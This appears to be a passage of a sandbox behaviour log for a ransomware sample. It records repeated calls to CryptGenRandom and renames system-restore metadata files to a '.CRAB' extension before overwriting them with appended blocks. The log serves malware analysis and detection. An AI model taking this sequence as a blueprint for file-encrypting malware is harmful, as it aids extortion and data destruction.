Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 952 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp.CRAB, size = 960 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2216 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp.CRAB, size = 2224 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3624 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp.CRAB, size = 3632 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 1888 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp.CRAB, size = 1888 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2216 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp.CRAB, size = 2224 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3456 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp.CRAB, size = 3456 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2216 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp.CRAB, size = 2224 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2048 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp.CRAB, size = 2048 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2776 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp.CRAB, size = 2784 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2704 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp.CRAB, size = 2704 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3216 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp.CRAB, size = 3216 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2544 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp.CRAB, size = 2544 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2904 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp.CRAB, size = 2912 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3448 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp.CRAB, size = 3456 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp.CRAB, size = 2384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
